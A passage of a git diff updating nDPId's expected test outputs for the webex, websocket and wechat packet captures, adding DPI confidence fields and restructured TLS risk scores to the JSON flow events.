+00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00711{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00730{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","total-events-serialized":382}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","total-events-serialized":383}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1580/1580
 ~~ skipped flows.............: 0
@@ -388,10 +389,10 @@
 ~~ total active/idle flows...: 57/57
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4971448 bytes
-~~ total memory freed........: 4971448 bytes
-~~ total allocations/frees...: 101555/101555
+~~ total memory allocated....: 5031313 bytes
+~~ total memory freed........: 5031313 bytes
+~~ total allocations/frees...: 103145/103145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 1673 chars
-~~ json string avg len.......: 987 chars
+~~ json string max len.......: 1859 chars
+~~ json string avg len.......: 1080 chars
diff --git a/test/results/websocket.pcap.out b/test/results/websocket.pcap.out
index 464051374..8a641cc54 100644
--- a/test/results/websocket.pcap.out
+++ b/test/results/websocket.pcap.out
@@ -1,10 +1,10 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"websocket.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"proto":"WebSocket","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7440000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WebSocket","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7440000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 5/5
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597022 bytes
-~~ total memory freed........: 4597022 bytes
-~~ total allocations/frees...: 99559/99559
+~~ total memory allocated....: 4681975 bytes
+~~ total memory freed........: 4681975 bytes
+~~ total allocations/frees...: 101149/101149
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 656 chars
-~~ json string avg len.......: 471 chars
+~~ json string max len.......: 682 chars
+~~ json string avg len.......: 484 chars
diff --git a/test/results/wechat.pcap.out b/test/results/wechat.pcap.out
index c364c6ba5..7b6c7d98e 100644
--- a/test/results/wechat.pcap.out
+++ b/test/results/wechat.pcap.out
@@ -4,26 +4,26 @@
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMlAAAERHdXAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167338426,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1492167338426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMpAAAERHdTAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
